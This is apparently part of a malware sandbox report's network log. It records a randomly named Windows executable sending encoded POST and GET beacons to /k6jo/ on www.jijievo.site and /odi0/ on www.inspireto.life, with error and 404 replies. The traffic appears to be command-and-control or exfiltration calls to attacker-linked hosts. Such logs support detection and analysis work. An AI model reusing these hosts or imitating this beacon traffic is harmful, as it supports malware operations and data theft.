                                                                                                                            Dec 3, 2024 14:38:48.544800997 CET803OUTPOST /k6jo/ HTTP/1.1
                                                                                                                            Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                                                                            Accept-Encoding: gzip, deflate, br
                                                                                                                            Accept-Language: en-US,en;q=0.5
                                                                                                                            Host: www.jijievo.site
                                                                                                                            Content-Length: 213
                                                                                                                            Content-Type: application/x-www-form-urlencoded
                                                                                                                            Cache-Control: no-cache
                                                                                                                            Connection: close
                                                                                                                            Origin: http://www.jijievo.site
                                                                                                                            Referer: http://www.jijievo.site/k6jo/
                                                                                                                            User-Agent: Mozilla/5.0 (Linux; U; Android 4.2.2; en-us; GT-N7100 Build/JDQ39) AppleWebKit/534.30 (KHTML, like Gecko) Version/4.0 Mobile Safari/534.30
                                                                                                                            Data Raw: 75 36 6e 50 5f 46 34 38 3d 74 30 49 68 48 53 5a 72 32 33 48 57 4a 77 5a 78 42 2f 4c 6b 31 73 51 59 6d 46 34 34 42 65 69 38 62 61 52 7a 66 34 47 52 4f 6b 30 75 6a 38 66 32 58 31 2b 6f 44 72 5a 39 7a 69 57 30 6b 49 54 57 56 69 38 63 4b 43 6b 59 4f 66 57 65 32 7a 6c 61 55 78 73 42 61 7a 61 33 6a 30 43 69 2f 35 6b 4d 73 65 71 57 32 65 63 39 37 30 58 31 4e 6f 4a 48 75 57 46 66 74 37 65 45 61 4e 6b 53 6c 31 68 43 6b 4e 79 77 71 69 63 74 41 4b 39 70 35 30 63 30 6e 6f 49 73 63 32 38 71 68 52 2b 6e 63 59 48 5a 6b 6b 34 46 76 57 6e 41 4b 69 48 32 39 34 39 33 35 39 49 64 4b 70 2b 78 41 44 46 50 52 39 54 63 78 4f 6c 68 6c 70 47 43 71 53 42 4f
                                                                                                                            Data Ascii: u6nP_F48=t0IhHSZr23HWJwZxB/Lk1sQYmF44Bei8baRzf4GROk0uj8f2X1+oDrZ9ziW0kITWVi8cKCkYOfWe2zlaUxsBaza3j0Ci/5kMseqW2ec970X1NoJHuWFft7eEaNkSl1hCkNywqictAK9p50c0noIsc28qhR+ncYHZkk4FvWnAKiH2949359IdKp+xADFPR9TcxOlhlpGCqSBO


                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                            2192.168.2.649876154.90.35.240805868C:\Program Files (x86)\jxvBoUoRVImTlYTBniSBFOGvGdJGecWXoXjUJTHdYuHBHGyZlaKpIgYeTZDrsAOiz\XVZmwHdSYwx.exe
                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                            Dec 3, 2024 14:38:51.216475010 CET827OUTPOST /k6jo/ HTTP/1.1
                                                                                                                            Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                                                                            Accept-Encoding: gzip, deflate, br
                                                                                                                            Accept-Language: en-US,en;q=0.5
                                                                                                                            Host: www.jijievo.site
                                                                                                                            Content-Length: 237
                                                                                                                            Content-Type: application/x-www-form-urlencoded
                                                                                                                            Cache-Control: no-cache
                                                                                                                            Connection: close
                                                                                                                            Origin: http://www.jijievo.site
                                                                                                                            Referer: http://www.jijievo.site/k6jo/
                                                                                                                            User-Agent: Mozilla/5.0 (Linux; U; Android 4.2.2; en-us; GT-N7100 Build/JDQ39) AppleWebKit/534.30 (KHTML, like Gecko) Version/4.0 Mobile Safari/534.30
                                                                                                                            Data Raw: 75 36 6e 50 5f 46 34 38 3d 74 30 49 68 48 53 5a 72 32 33 48 57 4a 51 70 78 61 63 6a 6b 6b 63 51 66 36 56 34 34 55 75 69 34 62 61 64 7a 66 39 69 42 50 53 6b 75 6b 5a 37 32 59 52 4b 6f 43 72 5a 39 37 43 57 78 71 6f 54 64 56 69 34 75 4b 41 77 59 4f 66 53 65 32 79 56 61 56 43 30 43 49 7a 61 70 72 55 43 6b 78 5a 6b 4d 73 65 71 57 32 65 49 48 37 31 7a 31 4e 59 5a 48 75 33 46 63 72 4c 65 44 62 4e 6b 53 68 31 68 47 6b 4e 7a 66 71 6e 39 34 41 49 46 70 35 30 73 30 6e 39 38 6a 56 32 38 7a 38 42 2f 70 51 4c 33 64 2b 43 39 4b 6d 6e 66 50 4b 6a 69 51 34 4f 67 74 6c 4f 49 2b 59 35 65 7a 41 42 64 39 52 64 54 32 7a 4f 64 68 33 2b 4b 6c 6c 6d 6b 74 35 6f 7a 77 43 75 35 69 56 2f 74 6d 62 76 4e 47 74 75 55 41 4c 77 3d 3d
                                                                                                                            Data Ascii: u6nP_F48=t0IhHSZr23HWJQpxacjkkcQf6V44Uui4badzf9iBPSkukZ72YRKoCrZ97CWxqoTdVi4uKAwYOfSe2yVaVC0CIzaprUCkxZkMseqW2eIH71z1NYZHu3FcrLeDbNkSh1hGkNzfqn94AIFp50s0n98jV28z8B/pQL3d+C9KmnfPKjiQ4OgtlOI+Y5ezABd9RdT2zOdh3+Kllmkt5ozwCu5iV/tmbvNGtuUALw==


                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                            3192.168.2.649883154.90.35.240805868C:\Program Files (x86)\jxvBoUoRVImTlYTBniSBFOGvGdJGecWXoXjUJTHdYuHBHGyZlaKpIgYeTZDrsAOiz\XVZmwHdSYwx.exe
                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                            Dec 3, 2024 14:38:53.897022009 CET1840OUTPOST /k6jo/ HTTP/1.1
                                                                                                                            Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                                                                            Accept-Encoding: gzip, deflate, br
                                                                                                                            Accept-Language: en-US,en;q=0.5
                                                                                                                            Host: www.jijievo.site
                                                                                                                            Content-Length: 1249
                                                                                                                            Content-Type: application/x-www-form-urlencoded
                                                                                                                            Cache-Control: no-cache
                                                                                                                            Connection: close
                                                                                                                            Origin: http://www.jijievo.site
                                                                                                                            Referer: http://www.jijievo.site/k6jo/
                                                                                                                            User-Agent: Mozilla/5.0 (Linux; U; Android 4.2.2; en-us; GT-N7100 Build/JDQ39) AppleWebKit/534.30 (KHTML, like Gecko) Version/4.0 Mobile Safari/534.30
                                                                                                                            Data Raw: 75 36 6e 50 5f 46 34 38 3d 74 30 49 68 48 53 5a 72 32 33 48 57 4a 51 70 78 61 63 6a 6b 6b 63 51 66 36 56 34 34 55 75 69 34 62 61 64 7a 66 39 69 42 50 53 73 75 6b 71 44 32 5a 77 4b 6f 54 62 5a 39 78 69 57 77 71 6f 54 4d 56 6b 52 6c 4b 41 74 74 4f 64 36 65 33 51 74 61 45 48 41 43 43 7a 61 70 6e 30 43 6c 2f 35 6b 5a 73 65 36 53 32 65 59 48 37 31 7a 31 4e 61 78 48 70 6d 46 63 77 4c 65 45 61 4e 6b 47 6c 31 68 75 6b 4f 43 6f 71 6e 78 6f 41 37 4e 70 67 51 49 30 67 50 6b 6a 61 32 38 78 76 78 2b 30 51 4c 36 44 2b 43 4a 67 6d 6e 36 67 4b 69 61 51 35 61 31 47 67 38 34 49 44 4c 2b 2b 51 6a 35 35 4b 59 4c 47 72 64 5a 75 6e 59 57 73 6e 55 34 34 38 4e 72 57 4e 4e 49 75 43 75 4e 77 51 61 55 5a 68 75 4d 51 4c 37 30 6d 42 34 78 6f 75 6a 47 70 34 50 71 69 42 54 56 6b 67 6d 64 42 79 41 2b 52 4e 69 79 56 68 65 6d 32 53 78 31 70 7a 37 6e 6f 77 65 41 47 78 32 61 5a 79 37 73 52 72 65 46 44 59 50 72 57 38 2f 78 63 55 47 72 4e 67 34 4f 65 73 48 4a 54 36 6a 36 78 51 51 67 65 37 38 52 6a 34 49 78 56 74 51 31 76 7a 34 65 37 36 [TRUNCATED]
                                                                                                                            Data Ascii: u6nP_F48=t0IhHSZr23HWJQpxacjkkcQf6V44Uui4badzf9iBPSsukqD2ZwKoTbZ9xiWwqoTMVkRlKAttOd6e3QtaEHACCzapn0Cl/5kZse6S2eYH71z1NaxHpmFcwLeEaNkGl1hukOCoqnxoA7NpgQI0gPkja28xvx+0QL6D+CJgmn6gKiaQ5a1Gg84IDL++Qj55KYLGrdZunYWsnU448NrWNNIuCuNwQaUZhuMQL70mB4xoujGp4PqiBTVkgmdByA+RNiyVhem2Sx1pz7noweAGx2aZy7sRreFDYPrW8/xcUGrNg4OesHJT6j6xQQge78Rj4IxVtQ1vz4e764SOUDrhWw2NzyP0yRDiR9BkRFIiN/BaW0IIHCjURO/x2JYBzlYHFB+mrsMaakDE0F5raldDkTCk6NKpzAituSjIX2cJG54myVBjnCCDS4XwQTM8xA+SGvQ8plW4kbcB8kwDgm7QwUdWhD8FDeISItyLwL8mqyNSIYDLGnMG5vHQ/OGIFVw1HUFit+s+4NYyMbnm5WcZ8vruDgVCUhf8aM/8DeRrHPWK4E53PmqPWqOnqqx3NlDcSmwdCX3r6z92Fzczndo/6ArHjDfuxBgQhzYLDnGkK/bSVG9nuXw6BpdLhY5aZi1Dwh91beRb1PEB9a6tBFARnxlnWrT5I5W49S7FEPfGnphr+8quHEA4OYJDPbUuonOAQhg85qVb8HpGqlQqTYuODIL/gAlGfMPXVBE13S0nvOdUP0NIRqldU0XiFZHeRI/BoRUwfmZ936CqXqULKvWAdthqn6gyiYrOZd52168fpv+pYtJ0/zLRQ+r6MJR3MTthdvd6U2Dh2EFQ1IX4Qk7+waZmOzBO9XJ6sCChx5ExmC9cqrYM5x6vKOMn5IWuSaFTYxy4tr36U1177ozoyY179i0hvOasF1un/6dwagnp0fEwqhyc0xLeOppdh8Lyo3MMP+U8HcRcPThNpEa49ayb+5jrGy4bd9TU7xW7xCwocJZDniw [TRUNCATED]


                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                            4192.168.2.649889154.90.35.240805868C:\Program Files (x86)\jxvBoUoRVImTlYTBniSBFOGvGdJGecWXoXjUJTHdYuHBHGyZlaKpIgYeTZDrsAOiz\XVZmwHdSYwx.exe
                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                            Dec 3, 2024 14:38:56.553672075 CET552OUTGET /k6jo/?u6nP_F48=g2gBEi9B+HDFGx1wG+72kN8Yj19AUdr4Nr1Jd72ZJlQgpbXPbifaD6lB1zmlmZG8AmkyaCU7LvK0zzlsdiU5EFaXnjyK5oQQkYGW08c3lB7eL51xgHFAptm5WP0FkXlczfO1jHA=&F8S0G=ul80rPhxFlR8lH HTTP/1.1
                                                                                                                            Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                                                                            Accept-Language: en-US,en;q=0.5
                                                                                                                            Host: www.jijievo.site
                                                                                                                            Connection: close
                                                                                                                            User-Agent: Mozilla/5.0 (Linux; U; Android 4.2.2; en-us; GT-N7100 Build/JDQ39) AppleWebKit/534.30 (KHTML, like Gecko) Version/4.0 Mobile Safari/534.30
                                                                                                                            Dec 3, 2024 14:38:58.419655085 CET197INHTTP/1.1 200 OK
                                                                                                                            Content-Type: text/html; charset=UTF-8
                                                                                                                            Date: Tue, 03 Dec 2024 13:38:58 GMT
                                                                                                                            Server: nginx
                                                                                                                            Vary: Accept-Encoding
                                                                                                                            Content-Length: 24
                                                                                                                            Connection: close
                                                                                                                            Data Raw: 55 6e 61 62 6c 65 20 74 6f 20 67 65 74 20 63 6f 6e 6e 65 63 74 69 6f 6e
                                                                                                                            Data Ascii: Unable to get connection


                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                            5192.168.2.649907162.0.213.94805868C:\Program Files (x86)\jxvBoUoRVImTlYTBniSBFOGvGdJGecWXoXjUJTHdYuHBHGyZlaKpIgYeTZDrsAOiz\XVZmwHdSYwx.exe
                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                            Dec 3, 2024 14:39:04.053203106 CET809OUTPOST /odi0/ HTTP/1.1
                                                                                                                            Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                                                                            Accept-Encoding: gzip, deflate, br
                                                                                                                            Accept-Language: en-US,en;q=0.5
                                                                                                                            Host: www.inspireto.life
                                                                                                                            Content-Length: 213
                                                                                                                            Content-Type: application/x-www-form-urlencoded
                                                                                                                            Cache-Control: no-cache
                                                                                                                            Connection: close
                                                                                                                            Origin: http://www.inspireto.life
                                                                                                                            Referer: http://www.inspireto.life/odi0/
                                                                                                                            User-Agent: Mozilla/5.0 (Linux; U; Android 4.2.2; en-us; GT-N7100 Build/JDQ39) AppleWebKit/534.30 (KHTML, like Gecko) Version/4.0 Mobile Safari/534.30
                                                                                                                            Data Raw: 75 36 6e 50 5f 46 34 38 3d 4e 38 37 69 75 6c 47 66 6c 6d 72 35 6d 71 6b 36 6e 38 66 73 6e 70 50 49 4e 31 74 49 6c 36 44 6c 69 6c 36 4f 5a 63 68 51 32 2f 48 67 66 2f 75 6f 30 73 4a 77 4e 6d 6a 5a 61 38 61 31 69 4f 57 54 5a 50 4e 44 59 78 6e 69 4f 6c 77 55 44 58 58 69 73 31 58 34 58 35 31 36 46 6b 32 30 54 55 56 37 73 34 4d 46 6a 6e 51 34 62 56 32 6c 47 51 65 45 65 70 68 71 79 37 6d 50 34 43 64 37 57 78 31 6b 4b 57 51 6c 4c 30 2b 72 6a 66 74 64 53 55 74 4c 34 73 4d 45 50 43 2f 30 62 43 68 6f 46 50 2f 47 4d 72 59 64 6e 65 59 37 4c 45 71 72 53 2f 57 7a 5a 46 68 6f 52 64 6d 6f 51 30 32 79 42 77 65 4c 59 48 53 53 6f 77 76 6d 71 6b 33 59
                                                                                                                            Data Ascii: u6nP_F48=N87iulGflmr5mqk6n8fsnpPIN1tIl6Dlil6OZchQ2/Hgf/uo0sJwNmjZa8a1iOWTZPNDYxniOlwUDXXis1X4X516Fk20TUV7s4MFjnQ4bV2lGQeEephqy7mP4Cd7Wx1kKWQlL0+rjftdSUtL4sMEPC/0bChoFP/GMrYdneY7LEqrS/WzZFhoRdmoQ02yBweLYHSSowvmqk3Y
                                                                                                                            Dec 3, 2024 14:39:05.373219967 CET1236INHTTP/1.1 404 Not Found
                                                                                                                            Date: Tue, 03 Dec 2024 13:39:05 GMT
                                                                                                                            Server: Apache
                                                                                                                            Content-Length: 16052
                                                                                                                            Connection: close
                                                                                                                            Content-Type: text/html
                                                                                                                            Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 20 3e 0a 3c 68 65 61 64 3e 0a 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 55 54 46 2d 38 22 3e 0a 20 20 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 20 20 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 63 64 6e 6a 73 2e 63 6c 6f 75 64 66 6c 61 72 65 2e 63 6f 6d 2f 61 6a 61 78 2f 6c 69 62 73 2f 6e 6f 72 6d 61 6c 69 7a 65 2f 35 2e 30 2e 30 2f 6e 6f 72 6d 61 6c 69 7a 65 2e 6d 69 6e 2e 63 73 73 22 3e 0a 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 20 68 72 65 66 3d 22 2f 34 32 2e 63 73 73 22 3e 0a 0a 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 3e 0a 3c 21 2d 2d 20 70 61 72 74 69 61 6c 3a 69 6e 64 65 78 2e 70 61 72 74 69 61 6c 2e 68 74 6d 6c 20 2d 2d 3e 0a 3c 6d 61 69 6e 3e 0a 20 3c 73 76 67 0a 20 20 20 20 20 76 69 65 77 42 6f 78 3d 22 30 20 30 20 35 34 31 2e 31 37 32 30 36 20 33 32 38 [TRUNCATED]
                                                                                                                            Data Ascii: <!DOCTYPE html><html lang="en" ><head> <meta charset="UTF-8"> <title>404 Not Found</title> <link rel="stylesheet" href="https://cdnjs.cloudflare.com/ajax/libs/normalize/5.0.0/normalize.min.css"><link rel="stylesheet" href="/42.css"></head><body>... partial:index.partial.html --><main> <svg viewBox="0 0 541.17206 328.45184" height="328.45184" width="541.17206" id="svg2" version="1.1"> <metadata id="metadata8"> </metadata> <defs id="defs6"> <pattern patternUnits="userSpaceOnUse" width="1.5" height="1" patternTransform="translate(0,0) scale(10,10)" id="Strips2_1"> <rect style="fill:black;stroke:none" x="0" y="-0.5" width="1" height="2" id="rect5419" /> </pattern> <linearGradient osb:paint="solid" id="linearGradient6096"> <stop id="stop6094" offset="0" [TRUNCATED]
                                                                                                                            Dec 3, 2024 14:39:05.373302937 CET1236INData Raw: 3e 0a 20 20 20 20 3c 2f 64 65 66 73 3e 0a 20 20 20 20 3c 67 0a 20 20 20 20 20 20 20 74 72 61 6e 73 66 6f 72 6d 3d 22 74 72 61 6e 73 6c 61 74 65 28 31 37 30 2e 31 34 35 31 35 2c 30 2e 30 33 38 31 36 34 29 22 0a 20 20 20 20 20 20 20 69 64 3d 22 6c
                                                                                                                            Data Ascii: > </defs> <g transform="translate(170.14515,0.038164)" id="layer1"> <g id="g6219" > <path transform="matrix(1.0150687,0,0,11.193923,-1.3895945,-2685.7441)" style="disp
                                                                                                                            Dec 3, 2024 14:39:05.373321056 CET448INData Raw: 38 2e 38 35 38 37 31 35 20 2d 30 2e 36 30 32 31 37 35 2c 2d 33 31 2e 34 36 39 32 32 38 20 2d 30 2e 30 31 32 35 33 2c 2d 32 32 2e 37 35 39 35 36 35 20 30 2e 37 31 37 32 36 32 2c 2d 34 31 2e 32 33 31 34 35 32 31 33 20 31 2e 36 32 38 39 39 35 2c 2d
                                                                                                                            Data Ascii: 8.858715 -0.602175,-31.469228 -0.01253,-22.759565 0.717262,-41.23145213 1.628995,-41.23195399 z" style="display:inline;fill:#000000;stroke:none;stroke-width:0.23743393px;stroke-linecap:butt;stroke-linejoin:miter;stroke-opacity:1;"
                                                                                                                            Dec 3, 2024 14:39:05.373498917 CET1236INData Raw: 36 38 31 31 33 20 2d 31 2e 33 35 35 38 35 33 2c 31 2e 35 30 33 31 32 20 2d 32 2e 34 37 33 37 36 34 2c 33 2e 30 39 31 37 33 20 2d 33 2e 33 38 37 38 36 36 2c 34 2e 35 39 35 33 38 20 2d 30 2e 39 31 34 31 30 33 2c 31 2e 35 30 33 36 35 20 2d 31 2e 36
                                                                                                                            Data Ascii: 68113 -1.355853,1.50312 -2.473764,3.09173 -3.387866,4.59538 -0.914103,1.50365 -1.620209,2.91586 -2.416229,4.41952 -0.79602,1.50365 -1.67928,3.09352 -0.808656,3.24054 0.870624,0.14702 3.490408,-1.14815 5.700074,-1.91396 2.209666,-0.76581 4.0014
                                                                                                                            Dec 3, 2024 14:39:05.373543024 CET1236INData Raw: 34 39 36 35 35 2c 31 33 2e 36 36 36 30 35 20 2d 31 33 2e 39 31 36 36 30 38 2c 31 38 2e 37 34 39 36 20 2d 33 2e 31 36 36 39 35 32 2c 35 2e 30 38 33 35 35 20 2d 34 2e 33 33 33 34 33 32 2c 38 2e 32 34 39 37 31 20 2d 34 2e 37 35 30 33 31 35 2c 31 31
                                                                                                                            Data Ascii: 49655,13.66605 -13.916608,18.7496 -3.166952,5.08355 -4.333432,8.24971 -4.750315,11.08369 -0.416883,2.83399 -0.08368,5.33304 1.809372,16.25302 1.893048,10.91998 5.343489,30.24673 9.760132,48.66349 4.416642,18.41676 9.798356,35.91675 15.180267,5
                                                                                                                            Dec 3, 2024 14:39:05.373569965 CET1236INData Raw: 37 38 36 2c 36 2e 32 32 39 31 32 20 31 31 2e 36 39 37 38 39 2c 31 32 2e 32 32 39 31 34 20 31 37 2e 31 31 34 35 36 2c 31 38 2e 33 39 35 38 31 20 35 2e 34 31 36 36 36 2c 36 2e 31 36 36 36 37 20 31 30 2e 37 34 39 39 36 2c 31 32 2e 34 39 39 39 35 20
                                                                                                                            Data Ascii: 786,6.22912 11.69789,12.22914 17.11456,18.39581 5.41666,6.16667 10.74996,12.49995 14.74993,17.91655 3.99997,5.41659 6.66659,9.91653 7.16671,17.83316 0.50012,7.91664 -1.16644,19.24921 -3.3502,31.24619 -2.18376,11.99698 -4.81616,24.33632 -8.4206
                                                                                                                            Dec 3, 2024 14:39:05.373581886 CET1236INData Raw: 33 2c 32 33 2e 38 30 36 34 37 20 2d 30 2e 35 33 30 33 34 2c 31 34 2e 31 34 33 33 38 20 2d 32 2e 38 38 37 30 36 2c 33 36 2e 35 33 32 32 36 20 2d 35 2e 34 32 30 39 2c 35 36 2e 34 34 39 35 31 20 2d 32 2e 35 33 33 38 33 2c 31 39 2e 39 31 37 32 35 20
                                                                                                                            Data Ascii: 3,23.80647 -0.53034,14.14338 -2.88706,36.53226 -5.4209,56.44951 -2.53383,19.91725 -5.24428,37.35836 -7.95503,54.80146" style="display:inline;fill:none;stroke:#000000;stroke-width:1px;stroke-linecap:butt;stroke-linejoin:miter;strok
                                                                                                                            Dec 3, 2024 14:39:05.374119997 CET896INData Raw: 62 75 74 74 3b 73 74 72 6f 6b 65 2d 6c 69 6e 65 6a 6f 69 6e 3a 6d 69 74 65 72 3b 73 74 72 6f 6b 65 2d 6f 70 61 63 69 74 79 3a 31 3b 22 20 2f 3e 0a 20 20 20 20 20 20 20 20 20 20 3c 70 61 74 68 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 69 64 3d 22
                                                                                                                            Data Ascii: butt;stroke-linejoin:miter;stroke-opacity:1;" /> <path id="path4545" d="m 83.12978,122.92016 c -2.601311,10.56131 -5.214983,21.17282 -7.40283,31.41665 -2.187847,10.24384 -3.955407,20.14218 -5.074975,26.03483
                                                                                                                            Dec 3, 2024 14:39:05.374237061 CET1236INData Raw: 39 35 2c 35 33 2e 38 34 37 34 36 20 32 2e 32 33 37 39 31 33 2c 31 39 2e 33 37 38 32 39 20 34 2e 38 33 33 31 30 39 2c 33 36 2e 37 31 38 39 32 20 37 2e 34 32 35 39 35 39 2c 35 34 2e 30 34 33 38 37 22 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 73 74
                                                                                                                            Data Ascii: 95,53.84746 2.237913,19.37829 4.833109,36.71892 7.425959,54.04387" style="display:inline;fill:none;stroke:#000000;stroke-width:1px;stroke-linecap:butt;stroke-linejoin:miter;stroke-opacity:1;" /> <path id="pa
                                                                                                                            Dec 3, 2024 14:39:05.374391079 CET1236INData Raw: 34 35 38 30 36 2c 33 36 2e 38 33 32 31 36 20 2d 31 32 2e 36 38 37 35 2c 35 35 2e 32 35 22 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 73 74 79 6c 65 3d 22 64 69 73 70 6c 61 79 3a 69 6e 6c 69 6e 65 3b 66 69 6c 6c 3a 6e 6f 6e 65 3b 73 74 72 6f 6b 65
                                                                                                                            Data Ascii: 45806,36.83216 -12.6875,55.25" style="display:inline;fill:none;stroke:#000000;stroke-width:1px;stroke-linecap:butt;stroke-linejoin:miter;stroke-opacity:1;" /> <ellipse ry="4.6715717" rx="2.5"
                                                                                                                            Dec 3, 2024 14:39:05.493640900 CET1236INData Raw: 6f 6e 65 3b 73 74 72 6f 6b 65 2d 6f 70 61 63 69 74 79 3a 31 3b 22 20 2f 3e 0a 20 20 20 20 20 20 20 20 20 20 3c 70 61 74 68 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 74 72 61 6e 73 66 6f 72 6d 3d 22 74 72 61 6e 73 6c 61 74 65 28 2d 31 37 30 2e 31
                                                                                                                            Data Ascii: one;stroke-opacity:1;" /> <path transform="translate(-170.14515,-0.038164)" id="path4567" d="m 321.74355,168.0687 c -1e-5,3.3913 -3.42414,11.26702 -8.73834,11.26702 -5.3142,0 -18.59463,27.24606


                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                            6192.168.2.649916162.0.213.94805868C:\Program Files (x86)\jxvBoUoRVImTlYTBniSBFOGvGdJGecWXoXjUJTHdYuHBHGyZlaKpIgYeTZDrsAOiz\XVZmwHdSYwx.exe
                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                            Dec 3, 2024 14:39:06.715790987 CET833OUTPOST /odi0/ HTTP/1.1
                                                                                                                            Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                                                                            Accept-Encoding: gzip, deflate, br
                                                                                                                            Accept-Language: en-US,en;q=0.5
                                                                                                                            Host: www.inspireto.life
                                                                                                                            Content-Length: 237
                                                                                                                            Content-Type: application/x-www-form-urlencoded
                                                                                                                            Cache-Control: no-cache
                                                                                                                            Connection: close
                                                                                                                            Origin: http://www.inspireto.life
                                                                                                                            Referer: http://www.inspireto.life/odi0/
                                                                                                                            User-Agent: Mozilla/5.0 (Linux; U; Android 4.2.2; en-us; GT-N7100 Build/JDQ39) AppleWebKit/534.30 (KHTML, like Gecko) Version/4.0 Mobile Safari/534.30
                                                                                                                            Data Raw: 75 36 6e 50 5f 46 34 38 3d 4e 38 37 69 75 6c 47 66 6c 6d 72 35 30 37 55 36 67 76 48 73 77 5a 50 4c 43 56 74 49 71 61 44 68 69 6c 32 4f 5a 64 6c 41 33 4c 72 67 52 39 32 6f 6d 39 4a 77 4f 6d 6a 5a 43 73 62 78 6f 75 58 52 5a 50 42 4c 59 30 50 69 4f 6c 6b 55 44 56 66 69 73 43 72 2f 58 70 31 34 4b 45 32 79 4d 6b 56 37 73 34 4d 46 6a 6e 45 53 62 56 75 6c 47 44 32 45 65 49 68 74 74 4c 6d 4d 2f 43 64 37 53 78 31 67 4b 57 51 4c 4c 78 6e 77 6a 64 56 64 53 52 4a 4c 35 39 4e 32 42 43 2b 78 59 79 67 72 4c 36 69 39 43 4e 5a 73 34 38 55 73 53 44 69 77 65 70 4c 70 46 32 68 4c 44 4e 47 71 51 32 75 41 42 51 65 68 61 48 71 53 36 6e 6a 42 6c 51 53 37 58 56 33 68 70 2b 48 2f 66 64 71 51 4a 71 63 63 37 30 4c 2b 4c 51 3d 3d
                                                                                                                            Data Ascii: u6nP_F48=N87iulGflmr507U6gvHswZPLCVtIqaDhil2OZdlA3LrgR92om9JwOmjZCsbxouXRZPBLY0PiOlkUDVfisCr/Xp14KE2yMkV7s4MFjnESbVulGD2EeIhttLmM/Cd7Sx1gKWQLLxnwjdVdSRJL59N2BC+xYygrL6i9CNZs48UsSDiwepLpF2hLDNGqQ2uABQehaHqS6njBlQS7XV3hp+H/fdqQJqcc70L+LQ==
                                                                                                                            Dec 3, 2024 14:39:07.975531101 CET1236INHTTP/1.1 404 Not Found
                                                                                                                            Date: Tue, 03 Dec 2024 13:39:07 GMT
                                                                                                                            Server: Apache
                                                                                                                            Content-Length: 16052
                                                                                                                            Connection: close
                                                                                                                            Content-Type: text/html
                                                                                                                            Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 20 3e 0a 3c 68 65 61 64 3e 0a 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 55 54 46 2d 38 22 3e 0a 20 20 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 20 20 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 63 64 6e 6a 73 2e 63 6c 6f 75 64 66 6c 61 72 65 2e 63 6f 6d 2f 61 6a 61 78 2f 6c 69 62 73 2f 6e 6f 72 6d 61 6c 69 7a 65 2f 35 2e 30 2e 30 2f 6e 6f 72 6d 61 6c 69 7a 65 2e 6d 69 6e 2e 63 73 73 22 3e 0a 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 20 68 72 65 66 3d 22 2f 34 32 2e 63 73 73 22 3e 0a 0a 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 3e 0a 3c 21 2d 2d 20 70 61 72 74 69 61 6c 3a 69 6e 64 65 78 2e 70 61 72 74 69 61 6c 2e 68 74 6d 6c 20 2d 2d 3e 0a 3c 6d 61 69 6e 3e 0a 20 3c 73 76 67 0a 20 20 20 20 20 76 69 65 77 42 6f 78 3d 22 30 20 30 20 35 34 31 2e 31 37 32 30 36 20 33 32 38 [TRUNCATED]
                                                                                                                            Data Ascii: <!DOCTYPE html><html lang="en" ><head> <meta charset="UTF-8"> <title>404 Not Found</title> <link rel="stylesheet" href="https://cdnjs.cloudflare.com/ajax/libs/normalize/5.0.0/normalize.min.css"><link rel="stylesheet" href="/42.css"></head><body>... partial:index.partial.html --><main> <svg viewBox="0 0 541.17206 328.45184" height="328.45184" width="541.17206" id="svg2" version="1.1"> <metadata id="metadata8"> </metadata> <defs id="defs6"> <pattern patternUnits="userSpaceOnUse" width="1.5" height="1" patternTransform="translate(0,0) scale(10,10)" id="Strips2_1"> <rect style="fill:black;stroke:none" x="0" y="-0.5" width="1" height="2" id="rect5419" /> </pattern> <linearGradient osb:paint="solid" id="linearGradient6096"> <stop id="stop6094" offset="0" [TRUNCATED]
